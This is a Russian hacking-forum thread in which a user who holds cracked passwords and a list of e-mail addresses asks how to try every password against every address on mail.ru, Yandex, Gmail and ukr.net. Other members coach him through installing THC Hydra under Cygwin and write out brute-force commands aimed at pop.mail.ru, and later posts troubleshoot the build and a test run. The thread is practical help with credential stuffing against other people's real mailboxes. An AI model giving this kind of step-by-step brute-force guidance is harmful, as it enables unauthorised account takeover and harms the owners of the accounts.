Нужна помощь знающих людей.

Discussion in 'Уязвимости Mail-сервисов' started by emrik, 19 Jul 2015.

  1. emrik

    emrik Member

    Joined:
    7 May 2009
    Messages:
    364
    Likes Received:
    18
    Reputations:
    0
    Приветствую хакеры)
    В общем нужна Ваша помощь. Объясню сейчас более детально.
    Есть много расшифрованных паролей с хешей:соль , так же есть много e-mail адресов, вот из этих паролей которые имеются, один принадлежит к одному из этих email. Нужна в общем программа которая может все эти пароли подставлять к этим еmail (то есть все пароли к одному еmail, а потом к следующему и так далее. почта mail, yandex, gmail, ukr.net) как это все можно организовать?
     
    #1 emrik, 19 Jul 2015
    Last edited: 19 Jul 2015
  2. Alexandr II

    Alexandr II -=ImperatoR=-

    Joined:
    28 Dec 2007
    Messages:
    1,073
    Likes Received:
    641
    Reputations:
    87
    используй брут?!
     
  3. emrik

    emrik Member

    Joined:
    7 May 2009
    Messages:
    364
    Likes Received:
    18
    Reputations:
    0
    программа есть какая либо чтобы я это сделал автоматически? подскажите
     
  4. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    717
    Reputations:
    744
    Гидру не забываем ;)
    Currently this tool supports:
    Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST,
    HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD,
    HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle,
    PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, S7-300, SAP/R3, SIP, SMB, SMTP, SMTP Enum,
    SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.


    https://www.thc.org/thc-hydra/ + под винду нужен http://www.cygwin.com/
     
    _________________________
    #4 TANZWUT, 19 Jul 2015
    Last edited: 19 Jul 2015
    Alexandr II likes this.
  5. emrik

    emrik Member

    Joined:
    7 May 2009
    Messages:
    364
    Likes Received:
    18
    Reputations:
    0
    Боже как темный лес, проще есть что либо? или пояснения?
     
  6. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    717
    Reputations:
    744
    А что тут не понятного? Это самое простое и универсальное решение, сами Вы тёмный лес - выбрал протокол, список паролей и вперёд, или мануал лень читать?

    UPD:
    Если уж совсем лень, то:
    Code:
     hydra -L loginlist.txt -P passlist.txt -o log.txt  -t 5 -f pop.mail.ru pop3 
    До первого найденого валида, в 5 потоков.
     
    _________________________
    #6 TANZWUT, 19 Jul 2015
    Last edited: 19 Jul 2015
    emrik likes this.
  7. emrik

    emrik Member

    Joined:
    7 May 2009
    Messages:
    364
    Likes Received:
    18
    Reputations:
    0
    Как её запустить? скачал с сайта, установил cygwin. народ впервые с таким сталкиваюсь, в англ не силен, прошу покажите что да как.
     
  8. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25
    Powerful GeneratoR в помощь. умеет делать то что тебе требуется
     
    emrik likes this.
  9. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    717
    Reputations:
    744
    Запускай снова установку cygwin, не удаляя, где Select Packages жмякай Devel выбрав напротив install, после установки, открой терминал cygwin пиши:
    wget http://www.thc.org/releases/hydra-8.1.tar.gz
    tar xvzf hydra-8.1.tar.gz
    cd hydra-8.1
    ./configure
    make
    make install
    проверь установку набрав hydra -h
    затем cd ~

    ну а дальше переходи в папку C:\cygwin64\home\имя_пользователя\
    кидай сюда mail.txt и pass.txt, в терминале забивай:

    hydra -S -l mail.txt -p pass.txt -t 16 pop.mail.ru pop3

    [​IMG]
    Можно ещё и GUI сделать, если есть время и желание.
    [​IMG]

    Br@!ns, подставлять то умеет, но представь куча списков-файлов на каждое отдельное мыло, проще сразу брут запустить скормив по отдельности список mail.ru.txt и пароли passwords.txt
     
    _________________________
    #9 TANZWUT, 20 Jul 2015
    Last edited: 20 Jul 2015
    emrik likes this.
  10. emrik

    emrik Member

    Joined:
    7 May 2009
    Messages:
    364
    Likes Received:
    18
    Reputations:
    0
    данный пример показан на mail.ru ?
    $ wget http://www.thc.org/releases/hydra-8.1.tar.gz
    -bash: wget: команда не найдена
     
    #10 emrik, 20 Jul 2015
    Last edited: 20 Jul 2015
  11. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    717
    Reputations:
    744
    Да, на pop.mail.ru , скопируй или распакуй архив в C:\cygwin64\home\имя_пользователя\
     
    _________________________
    emrik likes this.
  12. emrik

    emrik Member

    Joined:
    7 May 2009
    Messages:
    364
    Likes Received:
    18
    Reputations:
    0
    Code:
    
    YULIA@YULIA-▒▒ ~
    $ wget http://www.thc.org/releases/hydra-8.1.tar.gz
    -bash: wget: команда не найдена
    
    YULIA@YULIA-▒▒ ~
    $ cd hydra-8.1
    
    YULIA@YULIA-▒▒ ~/hydra-8.1
    $ make
    make install./configure
    
    Starting hydra auto configuration ...
    
    Checking for openssl (libssl, libcrypto, ssl.h, sha.h) ...
                                                           ... NOT found, SSL support disabled
    Get it from http://www.openssl.org
    Checking for idn (libidn.so) ...
                                 ... NOT found, unicode logins and passwords will not be supported
    Checking for curses (libcurses.so / term.h) ...
                                                ... NOT found, color output disabled
    Checking for pcre (libpcre.so, pcre.h) ...
                                           ... NOT found, server response checks will be less reliable
    Checking for Postgres (libpq.so, libpq-fe.h) ...
                                                 ... NOT found, module postgres disabled
    Checking for SVN (libsvn_client-1 libapr-1.so libaprutil-1.so) ...
                                                                   ... NOT found, module svn disabled
    Checking for firebird (libfbclient.so) ...
                                           ... NOT found, module firebird disabled
    Checking for MYSQL client (libmysqlclient.so, math.h) ...
                                           ... math.h not found, module Mysql disabled
    Checking for AFP (libafpclient.so) ...
                                       ... NOT found, module Apple Filing Protocol disabled - Apple sucks anyway
    Checking for NCP (libncp.so / nwcalls.h) ...
                                             ... NOT found, module NCP disabled
    Checking for SAP/R3 (librfc/saprfc.h) ...
                                          ... NOT found, module sapr3 disabled
    Get it from http://www.sap.com/solutions/netweaver/linux/eval/index.asp
    Checking for libssh (libssh/libssh.h) ...
                                          ... NOT found, module ssh disabled
    Get it from http://www.libssh.org
    Checking for Oracle (libocci.so libclntsh.so / oci.h and libaio.so) ...
                                                                        ... NOT found, module Oracle disabled
    Get basic and sdk package from http://www.oracle.com/technetwork/database/features/instant-client/index.html
    Checking for GUI req's (pkg-config, gtk+-2.0) ...
                                                  ... NOT found, optional anyway
    Checking for Android specialities ...
                                      ... rindex() not found
    Checking for secure compile option support in gcc ...
                                                      Compiling... no
                                                      Linking... no
    
    Hydra will be installed into .../bin of: /usr/local
      (change this by running ./configure --prefix=path)
    
    Writing Makefile.in ...
    
    Cygwin detected, if compilation fails just update your installation.
    
    which: no windres in (/usr/local/bin:/usr/bin:/cygdrive/c/Windows/system32:/cygdrive/c/Windows:/cygdrive/c/Windows/System32/Wbem:/cygdrive/c/Windows/System32/WindowsPowerShell/v1.0:/cygdrive/c/Program Files/Broadcom/Broadcom 802.11/Driver:/cygdrive/c/Program Files/WIDCOMM/Bluetooth Software:/cygdrive/c/Program Files/Internet Explorer:/cygdrive/c/Program Files/Skype/Phone)
    Windres NOT found, you will not have pretty icon files in the hydra cygwin executables
    
    
    now type "make"
    
    YULIA@YULIA-▒▒ ~/hydra-8.1
    $ make
    -bash: make: команда не найдена
    
    
    что блин не так? голова кругом, пока никак не могу вникнуть. Вы уж простите)
     
    #12 emrik, 20 Jul 2015
    Last edited: 20 Jul 2015
  13. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    717
    Reputations:
    744
    _________________________
  14. emrik

    emrik Member

    Joined:
    7 May 2009
    Messages:
    364
    Likes Received:
    18
    Reputations:
    0
  15. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    717
    Reputations:
    744
    Ошибки т.к. не установленно много чего... проверь что всё установлено в Devel, вот поиск по make:
    [​IMG]
    Code:
    remote@TANZWUT-PC ~
    $ cd hydra-8.1/
    
    remote@TANZWUT-PC ~/hydra-8.1
    $ ./configure
    
    Starting hydra auto configuration ...
    
    Checking for openssl (libssl, libcrypto, ssl.h, sha.h) ...
      ... found
    Checking for idn (libidn.so) ...
      ... found
    Checking for curses (libcurses.so / term.h) ...
      ... found, color output enabled
    Checking for pcre (libpcre.so, pcre.h) ...
      ... found
    Checking for Postgres (libpq.so, libpq-fe.h) ...
      ... found
    Checking for SVN (libsvn_client-1 libapr-1.so libaprutil-1.so) ...
      ... found
    Checking for firebird (libfbclient.so) ...
      ... NOT found, module firebird disabled
    Checking for MYSQL client (libmysqlclient.so, math.h) ...
      ... NOT found, module Mysql will not support version > 4.x
    Checking for AFP (libafpclient.so) ...
      ... NOT found, module Apple Filing Protocol disabled - Apple sucks anyway
    Checking for NCP (libncp.so / nwcalls.h) ...
      ... NOT found, module NCP disabled
    Checking for SAP/R3 (librfc/saprfc.h) ...
      ... NOT found, module sapr3 disabled
    Get it from http://www.sap.com/solutions/netweaver/linux/eval/index.asp
    Checking for libssh (libssh/libssh.h) ...
      ... NOT found, module ssh disabled
    Get it from http://www.libssh.org
    Checking for Oracle (libocci.so libclntsh.so / oci.h and libaio.so) ...
      ... NOT found, module Oracle disabled
    Get basic and sdk package from http://www.oracle.com/technetwork/database/features/instant-client/index.html
    Checking for GUI req's (pkg-config, gtk+-2.0) ...
      ... found
    Checking for Android specialities ...
      ... rindex() found
      ... RSA_generate_key() found
    Checking for secure compile option support in gcc ...
      Compiling... yes
      Linking... no
    
    Hydra will be installed into .../bin of: /usr/local
      (change this by running ./configure --prefix=path)
    
    Writing Makefile.in ...
    
    Cygwin detected, if compilation fails just update your installation.
    
    Windres found, will attach icons to hydra cygwin executables
    
    now type "make"
    
    remote@TANZWUT-PC ~/hydra-8.1
    $ make
    
    Now type make install
    
    remote@TANZWUT-PC ~/hydra-8.1
    $ make install
    
    Now type make install
    strip hydra pw-inspector
    echo OK > /dev/null && test -x xhydra && strip xhydra || echo OK > /dev/null
    mkdir -p /usr/local/bin
    cp -f hydra-wizard.sh hydra pw-inspector /usr/local/bin && cd /usr/local/bin && chmod 755 hydra-wizard.sh hydra pw-inspector
    echo OK > /dev/null && test -x xhydra && cp xhydra /usr/local/bin && cd /usr/local/bin && chmod 755 xhydra || echo OK > /dev/null
    sed -e "s|^INSTALLDIR=.*|INSTALLDIR="/usr/local"|" dpl4hydra.sh > /usr/local/bin/dpl4hydra.sh
    chmod 755 /usr/local/bin/dpl4hydra.sh
    mkdir -p /usr/local/etc/
    cp -f *.csv /usr/local/etc/
    mkdir -p /usr/local/man/man1
    cp -f hydra.1 xhydra.1 pw-inspector.1 /usr/local/man/man1
    
    remote@TANZWUT-PC ~/hydra-8.1
    $ hydra -h
    Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
    
    Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvVd46] [service://server[:PORT][/OPT]]
    
    Options:
      -R  restore a previous aborted/crashed session
      -S  perform an SSL connect
      -s PORT  if the service is on a different default port, define it here
      -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
      -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
      -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
      -e nsr  try "n" null password, "s" login as pass and/or "r" reversed login
      -u  loop around users, not passwords (effective! implied with -x)
      -C FILE  colon separated "login:pass" format, instead of -L/-P options
      -M FILE  list of servers to attack, one entry per line, ':' to specify port
      -o FILE  write found login/password pairs to FILE instead of stdout
      -f / -F  exit when a login/pass pair is found (-M: -f per host, -F global)
      -t TASKS  run TASKS number of connects in parallel (per host, default: 16)
      -w / -W TIME  waittime for responses (32s) / between connects per thread
      -4 / -6  prefer IPv4 (default) or IPv6 addresses
      -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode
      -q  do not print messages about connection erros
      -U  service module usage details
      server  the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
      service  the service to crack (see below for supported protocols)
      OPT  some service modules support additional input (-U for module help)
    
    Supported services: asterisk cisco cisco-enable cvs ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql(v4) nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 svn teamspeak telnet[s] vmauthd vnc xmpp
    
    Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
    v3.0. The newest version is always available at http://www.thc.org/thc-hydra
    Don't use in military or secret service organizations, or for illegal purposes.
    These services were not compiled in: sapr3 firebird afp ncp ssh sshkey oracle mysql5.
    
    Use HYDRA_PROXY_HTTP or HYDRA_PROXY - and if needed HYDRA_PROXY_AUTH - environment for a proxy setup.
    E.g.:  % export HYDRA_PROXY=socks5://127.0.0.1:9150 (or socks4:// or connect://)
      % export HYDRA_PROXY_HTTP=http://proxy:8080
      % export HYDRA_PROXY_AUTH=user:pass
    
    Examples:
      hydra -l user -P passlist.txt ftp://192.168.0.1
      hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
      hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
      hydra -l admin -p password ftp://[192.168.0.0/24]/
      hydra -L logins.txt -P pws.txt -M targets.txt ssh
    
    remote@TANZWUT-PC ~/hydra-8.1
    $
    
    
    http://rghost.ru/85thNLyJz
     
    _________________________
    emrik likes this.
  16. emrik

    emrik Member

    Joined:
    7 May 2009
    Messages:
    364
    Likes Received:
    18
    Reputations:
    0
    ничего блин не получается, все делаю по описанию, ошибки снова. есть какая либо другая программа которая поможет мне в моей вопросе?
    вот что пишет

    YULIA@YULIA-▒▒ ~/hydra-8.1
    $ make install

    Now type make install
    strip hydra pw-inspector
    strip:hydra: Формат файла не распознан
    strip:pw-inspector: Формат файла не распознан
    Makefile:70: ошибка выполнения рецепта для цели «strip»
    make: *** [strip] Ошибка 1
     
    #16 emrik, 21 Jul 2015
    Last edited: 22 Jul 2015
  17. emrik

    emrik Member

    Joined:
    7 May 2009
    Messages:
    364
    Likes Received:
    18
    Reputations:
    0
    Прошу помощи
     
  18. emrik

    emrik Member

    Joined:
    7 May 2009
    Messages:
    364
    Likes Received:
    18
    Reputations:
    0
    так, все настроил как и у Вас, спасибо, только еще не подставлял пароли, только все сошлось по описанию и картинкам. Интересует вопрос мне постоянно это писать или можно только уже запустить терминал и все?

    wget http://www.thc.org/releases/hydra-8.1.tar.gz
    tar xvzf hydra-8.1.tar.gz
    cd hydra-8.1
    ./configure
    make
    make install
    проверь установку набрав hydra -h
    затем cd ~
     
  19. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    717
    Reputations:
    744
    hydra -h - выдало хэлп? Да - значит установлено, осталось с терминала запустить перебор, заново устанавливать не надо.
     
    _________________________
    emrik likes this.
  20. emrik

    emrik Member

    Joined:
    7 May 2009
    Messages:
    364
    Likes Received:
    18
    Reputations:
    0
    Прошу прощения, решил проверить на своей почте
    имеил и пароль указал верно, не могу понять в чем причина пишет что 0 invalid password found

    $ hydra -S -l mail.txt -p pass.txt -t 16 pop.mail.ru pop3
    Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

    Hydra (http://www.thc.org/thc-hydra) starting at 2015-07-23 22:27:30
    [INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
    [DATA] max 1 task per 1 server, overall 64 tasks, 1 login try (l:1/p:1), ~0 tries per task
    [DATA] attacking service pop3 on port 995 with SSL
    1 of 1 target completed, 0 valid passwords found
    Hydra (http://www.thc.org/thc-hydra) finished at 2015-07-23 22:27:36

    [​IMG]

    если вписывать именно имеил и пароль то работает, как показано на скриншоте, а если прописывать указывать txt, то нет.
     
    #20 emrik, 23 Jul 2015
    Last edited: 23 Jul 2015
Loading...